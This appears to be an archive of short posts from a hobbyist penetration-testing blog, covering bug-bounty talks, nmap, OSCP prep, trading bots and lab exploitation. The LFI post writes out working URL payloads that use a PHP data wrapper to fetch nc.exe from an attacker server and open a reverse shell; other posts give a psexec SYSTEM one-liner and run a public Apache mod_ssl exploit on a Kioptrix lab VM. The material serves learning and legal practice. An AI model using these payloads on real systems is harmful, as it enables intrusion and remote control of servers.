Since I am participating in Bugcrowd’s October Challenge Month I thought I would present to you the ever awesome @jhaddix’s bug hunter methodology talk from this year’s DefCon Red Team Villiage. He’s been giving and revising this talk for many years and this is an awesome version. As I work on my own project fro the challenge, I am just following along with the methods in the video, and it’s really upped my recon game. Supposedly there’s a second part of the talk on application testing, but I haven’t been able to find it yet. Word to the wise, if you want to get into bug bounty, follow Jason Haddix closely.
Category: hacking
-
Nmap Cheatsheet
Here’s a great nmap cheat sheet from Nathan House of StationX. I’ve taken some of his courses and found them to be a huge value in the cost to knowledge gained ratio. He’s also very helpful when you run into snags. f you really want to dive into nmap for hacking check out the NSE scripting engine. Start with nmap -sV -sC 192.168.1.1 and then maybe check here.
-
Hacker Toy
Ohh man, must have this little hacker toy currently on kickstarter. All the wireless protocols gamified with a cute dolphin avatar. This is both toy and tool. Everything from IR emulation to RFID badge cloning. Yes guys.
inspired by the pwnagotchi
-
Defcon SafeMode Playlist
Well I missed DEF CON yet again, but the videos are up and I’m going to spend my weekend attending virtual talks. Here’s the virtual playlists, but I really wish I’d done some of the interactive content. Maybe next year.
-
@TJ Null’s OSCP prep
If you are like me working you way through the PWK and OSCP, there’s worse ways to spend your time than @TJ Null’s playlist on youtube. Recently updated again with run-throughs by IppSec of relevant boxes. And if you haven’t yet, just get a VIP subscription to hackthebox.eu it’s 10 Euros a month for unlimited legal online practice. It’s worth it.
-
Hacker vs Economy
Not my image and no source available(probably from reddit) Started programming trading bots a couple of months ago and got a second one finished. For this one I used the robin-stocks api wrapper to interface with robinhood. The first is a crypto trading bot on the cex exchange. So far no profits, but (I think?) the idea is sound? Going to let them run and see if profits are to be had. Maybe patience will be a virtue here.
-
Simple Windows Privesc Admin to System
This will be short and sweet and I only post it because it’s hard to find via google but should be base knowledge for any hacker. SysInternals is your friend. If it’s on the box or you can drop it there it gives pretty complete control at a very granular level. Even if you drop one or two of the tools rather than the whole suite it makes privesc a breeze. For example If you have admin, and need System: psexec -i -s “cmd.exe” that is all. Pretty short and easy to read one-liner and good tool for the arsenal.
-
Some thoughts on LFI
Going over some really interesting stuff today on file includes and ran a couple neat exploits on php running on a windows 10 box. LFI/RFI is deadly. Sooo many ways to pop a shell if the url includes ?file=
My favorite of the day was using a php wrapper to pass a command to the page, which ended up letting me execute any arbitrary command on windows. It works like this: The page allows passing of data into the file parameter. Then you pass ?file=data:text/plain,<?php echo shell_exec(“Any random command and parameters”) ?> to the URL and boom command execution. You can use this to pass http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22certutil%20-urlcache%20-split%20-f%20%27http://<attack_server>/nc.exe%27%22)%20?%3E
this places netcat on the system. Then you start a netcat listener on your attack box and visit the URL:
http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22nc.exe%20-nv%20<Attacker IP>%20<Your listener port>%20-e%20cmd.exe%22)%20?%3E
Boom. Interactive reverse shell as the php user from visiting 2 URLs in the browser. Easy win.
Note: The %character escaping is needed for some browsers, but since you are quoting your command string, they may not be necessary as the browser will handle URL encoding on its own.
-
Practical Ethical Hacking Course Completed
I just finished an amazing hacking course by TheCyberMentor on udemy. It’s a great deal and provides a really practical introduction to pentesting by a professional. I highly recommend it. Woot!
-
Kioptrix Level 1 easy root
I’m taking The Cyber Mentor’s Practical Ethical Hacking Course on Udemy and during the scanning and enumeration chapter, we started scanning Kioptrix Level 1. I’ve played around with Kioptrix before and was already prepared to root the machine in a quick two-step, even though that’s not part of the section. To do this root, you’ll need a VMware player to run Kioptrix level one, which you can download from VulnHub. Get it running and find the IP address. I had a little difficulty with this as I couldn’t just pick it up with netdiscover on my network and had to do an nmap ping scan to discover hosts on my vmnet8 interface rather than my local network. Once I had the IP I poked around a bit, looked at the default webpage the server was hosting, ran dirbuster etc, but really got into it running nikto. Although an nmap scan showed an smb share hanging out, which is usually where I’d start probing, nikto showed this:
Wait what? I can pop a shell? Let’s look up the vuln.
Evidently these are way way way outdated versions of Apache and mod_ssl with a vuln that goes back to 2002. Also this sounds familiar. I’ve already exploited this on a box somewhere and have the exploit on my Kali box. For whatever reason this isn’t already implemented in metasploit, but exploit code is available on Exploit-DB and its called OpenFuck Classy I know. It’s in C and needs to be compiled with gcc to run, but I already had it from the last time I used it. ./OpenFuck 0x6b 172.16.XXX.XXX 443 -c 40 and what do I get?
Well I’m root already, no pivoting or privesc, just an easy rooted box. While I’m here I better grab some treasure.
Hashes to crack for later! Fun!
